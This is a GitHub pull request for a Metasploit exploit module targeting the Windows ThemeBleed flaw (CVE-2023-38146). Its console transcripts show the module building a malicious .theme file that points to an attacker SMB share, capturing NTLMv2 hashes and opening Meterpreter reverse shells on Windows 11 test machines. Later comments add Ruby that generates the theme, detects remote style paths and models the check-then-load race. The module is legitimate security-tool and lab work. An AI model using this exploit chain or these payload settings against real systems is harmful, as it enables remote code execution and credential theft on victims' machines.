
Working Module for CVE-2023-38146 #18404

Merged (15 commits) on Jan 4, 2024

Conversation

bwatters-r7 (Contributor)

This is a work in progress and is not currently working.
This adds a module targeting the fileformat vulnerability CVE-2023-38146.

closes #18367

bwatters-r7 changed the title from "Non-Working Draft Module" to "Non-Working Draft Module for CVE-2023-38146" on Sep 27, 2023
jvoisin (Contributor) commented Sep 29, 2023

CC @gabe-k :)

bwatters-r7 (Contributor, Author)

msf6 exploit(windows/fileformat/theme_dll_highjack_cve_2023_38146) > show options

Module options (exploit/windows/fileformat/theme_dll_highjack_cve_2023_38146):

   Name             Current Setting                      Required  Description
   ----             ---------------                      --------  -----------
   FILENAME         cve.theme                            no        The file name.
   FILE_NAME                                             no        File name to share (Default Random)
   FOLDER_NAME                                           no        Folder name to share (Default none)
   MS_PAYLOAD_DLL   /home/tmoose/rapid7/metasploit-fram  yes       Signed Microsoft DLL to use for passing validation
                    ework/themebleed-main/data/stage_3
   MS_SIGNED_DLL    /home/tmoose/rapid7/metasploit-fram  yes       Signed Microsoft DLL to use for passing validation
                    ework/themebleed-main/data/stage_2
   MS_VERSION_FILE  /home/tmoose/rapid7/metasploit-fram  yes       Signed Microsoft DLL to use for passing validation
                    ework/themebleed-main/data/stage_1
   SHARE            test                                 no        Share (Default Random)
   SRVHOST          10.5.135.201                         yes       The local host or network interface to listen on. This must be a
                                                                   n address on the local machine or 0.0.0.0 to listen on all addre
                                                                   sses.
   SRVPORT          4445                                 yes       The local port to listen on.
   STYLES_FILENAME  Aero                                 no        Styles filename


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/theme_dll_highjack_cve_2023_38146) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Server is running. Listening on 10.5.135.201:4445
[*] Server started.
[*] primer
msf6 exploit(windows/fileformat/theme_dll_highjack_cve_2023_38146) > [*] unc = \\10.5.135.201\test\Aero.msstyles_vrf.dll
[*] Shares: {"IPC$"=>#<RubySMB::Server::Share::Provider::IpcPipe:0x000055eb4afed180 @name="IPC$">, "test"=>#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 @vfs={"/"=>#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualPathname:0x000055eb4b04f8a8 @virtual_disk=#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 ...>, @path="/", @stat=#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualStat:0x000055eb4b04e340 @values={}, @birthtime=2023-10-02 13:45:05.643575405 -0500>>, "/PbxUOu"=>#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualDynamicFile:0x000055eb4b047a40 @content_generator=#<Proc:0x000055eb4b0478b0 /home/tmoose/rapid7/metasploit-framework/lib/msf/core/exploit/remote/smb/server/share.rb:63>, @virtual_disk=#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 ...>, @path="/PbxUOu", @stat=nil>}, @path=#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualPathname:0x000055eb4b04f8a8 @virtual_disk=#<RubySMB::Server::Share::Provider::VirtualDisk:0x000055eb4b04ff38 ...>, @path="/", @stat=#<RubySMB::Server::Share::Provider::VirtualDisk::VirtualStat:0x000055eb4b04e340 @values={}, @birthtime=2023-10-02 13:45:05.643575405 -0500>>, @name="test">}
[*] Shares test
[*] make_theme
[*] 1
[*] 2
[*] 3
[*] 4
[*] ; windows 11 theme exploit
; copyright 2023 fukin software foundation

[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2060

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\\10.5.135.201\test\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS

[+] cve.theme stored at /home/tmoose/.msf4/local/cve.theme
[*] Received SMB connection from 10.5.132.136
[SMB] NTLMv2-SSP Client     : 10.5.132.136
[SMB] NTLMv2-SSP Username   : .\msfuser
[SMB] NTLMv2-SSP Hash       : msfuser::.:d0314225e4f7ebd0:bc6c32071c01e2ffa0d699d428a06acc:…

[*] file_contents
[*] Serving 9119ab91e6c01a3018c9f602e8b73237
[*] file_contents
[*] Serving 4ce1420ace4e4266f94e96066b344d41



@smcintyre-r7 smcintyre-r7 self-assigned this Nov 1, 2023
bwatters-r7 force-pushed the exploit/cve-2023-38146 branch from a57b227 to 95eb4cc on December 12, 2023 16:09
bwatters-r7 changed the title from "Non-Working Draft Module for CVE-2023-38146" to "Working Draft Module for CVE-2023-38146" on Dec 21, 2023
bwatters-r7 added the rn-modules (release notes for new or majorly enhanced modules) and docs labels on Dec 21, 2023
@bwatters-r7 bwatters-r7 marked this pull request as ready for review December 21, 2023 00:45
bwatters-r7 (Contributor, Author)

After some serious help from Christophe and Spencer, this is finally ready for review. As a future thing, adding the ability to package the theme as a themepack file (AKA a cab file) would be nice, but this needs to get landed and it is easy enough to run lcab before uploading the file.

bwatters-r7 (Contributor, Author)

Windows 11 build 22000

I used the aero.msstyles file from my Windows 10 host.

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole
Metasploit tip: Display the Framework log using the log command, learn more with help log

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v6.3.47-dev-7fafab9680               ]
+ -- --=[ 2380 exploits - 1234 auxiliary - 417 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options

Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SHARE                             no        Share (Default Random)
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loc
                                               al machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          445              yes       The local port to listen on.
   STYLE_FILE                        yes       The Microsoft-signed .msstyles file (e.g. aero.msstyles).
   STYLE_FILE_NAME                   yes       The name of the style file to reference.
   THEME_FILE_NAME  exploit.theme    yes       The name of the theme file to generate.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set SRVHOST 10.5.135.201
SRVHOST => 10.5.135.201
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE '/home/tmoose/rapid7/metasploit-framework/aero.msstyles' 
STYLE_FILE => /home/tmoose/rapid7/metasploit-framework/aero.msstyles
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE_NAME aero
STYLE_FILE_NAME => aero
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set verbose true
verbose => true
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > 
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Server is running. Listening on 10.5.135.201:445
[*] Server started.
[+] exploit.theme stored at /home/tmoose/.msf4/local/exploit.theme
[*] Received SMB connection from 10.5.132.136
[SMB] NTLMv2-SSP Client     : 10.5.132.136
[SMB] NTLMv2-SSP Username   : .\msfuser
[SMB] NTLMv2-SSP Hash       : msfuser::.:571cefb4150fb5f1:059699f9eee7e044d95167c03c58c6b4:010100000000000000326d46a633da013654631d1e8ef262000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080000326d46a633da0106000400020000000800300030000000000000000100000000200000fe746065d66cc1efc7756d546af110124dd7d6b60126a5edff7b41cce14019d90a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000

[*] Sending file to 10.5.132.136
[*] Sending stage (200774 bytes) to 10.5.132.136
[*] Server stopped.
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.136:50003) at 2023-12-20 18:40:25 -0600

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-7M0LC28
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-7M0LC28\msfuser

bwatters-r7 changed the title from "Working Draft Module for CVE-2023-38146" to "Working Module for CVE-2023-38146" on Dec 21, 2023

smcintyre-r7 (Contributor) left a comment

I just successfully retested the latest changes and everything is looking good.

Testing Output
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options 

Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146):

   Name             Current Setting                                             Required  Description
   ----             ---------------                                             --------  -----------
   SHARE                                                                        no        Share (Default Random)
   SRVHOST          192.168.159.128                                             yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          445                                                         yes       The local port to listen on.
   STYLE_FILE       /home/smcintyre/Repositories/themebleed/data/aero.msstyles  yes       The Microsoft-signed .msstyles file (e.g. aero.msstyles).
   STYLE_FILE_NAME  Aero                                                        yes       The name of the style file to reference.
   THEME_FILE_NAME  exploit.theme                                               yes       The name of the theme file to generate.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > [*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Server is running. Listening on 192.168.159.128:445
[*] Server started.
[+] exploit.theme stored at /home/smcintyre/.msf4/local/exploit.theme

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > cat /home/smcintyre/.msf4/local/exploit.theme
[*] exec: cat /home/smcintyre/.msf4/local/exploit.theme

[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2060

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\\192.168.159.128\RDCXWb\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS
msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > 
[*] Received SMB connection from 192.168.159.70
[*] Skipping previously captured hash for .\smcintyre
[*] Sending file to 192.168.159.70
[*] Sending stage (200774 bytes) to 192.168.159.70
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.70:49974) at 2024-01-04 11:19:26 -0500

msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: windows-11-vm\smcintyre
meterpreter > sysinfo
Computer        : WINDOWS-11-VM
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
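The generated file printed by `cat` above is plain INI, and the only line that makes it dangerous is `Path=` under `[VisualStyles]`, which points the visual style at an SMB share instead of a local file. As an added example that is not code from this PR or the Metasploit module, the Ruby below builds that same theme file from a host, share and style name and, more usefully for defenders, parses an arbitrary `.theme` file and reports a `[VisualStyles] Path` that is a UNC path. The function names (`build_theme`, `parse_ini`, `remote_style_paths`) are illustrative; no RubySMB or Metasploit APIs are used, and the sample inputs are constructed from the values shown on this page.

```ruby
# Added example (not the module's code): generate the .theme shown in the
# review output and check any .theme for a remote visual style path.

# Build a minimal .theme whose visual style lives on an SMB share.
# Layout mirrors the file the module wrote in the transcript above.
def build_theme(host, share, style_name)
  <<~THEME
    [Theme]
    DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060

    [Control Panel\\Desktop]
    Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
    TileWallpaper=0
    WallpaperStyle=10

    [VisualStyles]
    Path=\\\\#{host}\\#{share}\\#{style_name}.msstyles
    ColorStyle=NormalColor
    Size=NormalSize

    [MasterThemeSelector]
    MTSM=RJSPBS
  THEME
end

# Minimal INI parser returning { section => { key => value } }.
# Section names may contain backslashes ("Control Panel\Desktop"), so the
# parser never splits on them; ';' and '#' lines are comments.
def parse_ini(text)
  sections = {}
  current = nil
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?(';', '#')
    if line =~ /\A\[(.+)\]\z/
      current = Regexp.last_match(1)
      sections[current] ||= {}
    elsif current && line.include?('=')
      key, value = line.split('=', 2)
      sections[current][key.strip] = value.strip
    end
  end
  sections
end

# A UNC path: two leading backslashes, a host, a backslash, a share.
UNC_RE = %r{\A\\\\[^\\]+\\[^\\]+}

# Return the [VisualStyles] Path if it is remote (UNC), else an empty list.
# A theme that pulls its .msstyles from another host is the precondition
# for the SMB-served DLL hijack this PR implements; a local path
# (%SystemRoot%\resources\Themes\...) is the normal case.
def remote_style_paths(theme_text)
  path = parse_ini(theme_text).dig('VisualStyles', 'Path')
  return [] unless path
  path.match?(UNC_RE) ? [path] : []
end

if __FILE__ == $PROGRAM_NAME
  theme = build_theme('192.168.159.128', 'RDCXWb', 'Aero')   # values from the transcript
  puts theme
  puts "remote style paths: #{remote_style_paths(theme).inspect}"
end
```

A `.themepack` is a CAB archive wrapped around the same `.theme` file (the earlier comment mentions running lcab to produce one), so expand it first and run the check over the extracted `.theme`. The check flags only the precondition of this chain, a visual style fetched from a remote host; it says nothing about whether the served `.msstyles` or its companion DLL is benign.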

@smcintyre-r7 smcintyre-r7 merged commit 2028fbd into rapid7:master Jan 4, 2024
33 of 34 checks passed
smcintyre-r7 (Contributor)

Release Notes

This adds an exploit for CVE-2023-38146, AKA ThemeBleed, which is a TOCTOU issue in the way Windows handles theme files. The vulnerability can be leveraged to load a payload DLL from Metasploit to execute code within the context of the user who loads it. A legitimate signed theme DLL must be provided in order to use the exploit.
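The release note calls this a TOCTOU issue, and the module's own output shows the mechanism from the server side: the draft transcript serves two different files (the two `Serving <hash>` lines) for the same share path, and the early option descriptions call the first one a "Signed Microsoft DLL to use for passing validation". The Ruby below is an added model of that pattern, not the module's code: a share file that returns a signed DLL on the first read and a payload on every later read, a loader that verifies one read and then loads a second read, and a loader that verifies and loads the same bytes. The DLL contents are constructed strings, the "signature" is a SHA-256 allow-list standing in for Authenticode, and how Windows itself sequences its reads of the `_vrf.dll` is not described on this page and is an assumption of the model.

```ruby
# Added example (not the module's code): model of a verify-then-load race
# against an attacker-controlled SMB share.
require 'digest'

# Constructed stand-ins for the two files the share can hand out.
SIGNED_DLL  = "MZ signed msstyles_vrf.dll (constructed sample)".b
PAYLOAD_DLL = "MZ attacker payload dll (constructed sample)".b

# Stand-in for signature validation: trust bytes only if their SHA-256 is
# the digest recorded for the signed DLL (not real Authenticode checking).
TRUSTED_DIGEST = Digest::SHA256.hexdigest(SIGNED_DLL)

def signed_ok?(bytes, trusted_digest = TRUSTED_DIGEST)
  Digest::SHA256.hexdigest(bytes) == trusted_digest
end

# Server side of the race: a file whose content depends on how many times
# it has been read. The first reader (the signature check) gets the signed
# DLL; every later reader (the actual load) gets the payload.
class SwappingFile
  attr_reader :reads

  def initialize(signed_bytes, payload_bytes)
    @signed  = signed_bytes
    @payload = payload_bytes
    @reads   = 0
  end

  def read
    @reads += 1
    @reads == 1 ? @signed : @payload
  end
end

# Vulnerable loader: reads the file to verify it, then reads it again to
# load it. The remote server decides what the second read returns.
# Returns the bytes that actually get "loaded", or nil if the check failed.
def verify_then_load_twice(file)
  return nil unless signed_ok?(file.read)   # time of check: read 1
  file.read                                  # time of use:   read 2
end

# Fixed loader: one read, verify those bytes, load those same bytes.
def verify_and_load_same_bytes(file)
  bytes = file.read
  signed_ok?(bytes) ? bytes : nil
end

# Run both loaders against a fresh swapping file each and report what
# each one ended up loading.
def race_outcome
  {
    double_read: verify_then_load_twice(SwappingFile.new(SIGNED_DLL, PAYLOAD_DLL)),
    single_read: verify_and_load_same_bytes(SwappingFile.new(SIGNED_DLL, PAYLOAD_DLL))
  }
end

if __FILE__ == $PROGRAM_NAME
  out = race_outcome
  puts "double-read loader executed: #{out[:double_read] == PAYLOAD_DLL ? 'PAYLOAD' : 'signed DLL'}"
  puts "single-read loader executed: #{out[:single_read] == SIGNED_DLL ? 'signed DLL' : 'PAYLOAD'}"
end
```

The double-read loader is the shape of every check-then-use bug over a file system the attacker serves: verifying a remote path and then loading that path again proves nothing about what gets loaded, because the server, not the client, chooses the second response. The remediation shape is to take one copy under your own control (into memory, or onto a local path the remote host cannot alter), verify that copy, and load only that copy.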

@bwatters-r7 bwatters-r7 deleted the exploit/cve-2023-38146 branch January 9, 2024 13:38
Labels: docs, rn-modules (release notes for new or majorly enhanced modules)
Successfully merging this pull request may close these issues: Windows 11 theme file rce (CVE-2023-38146)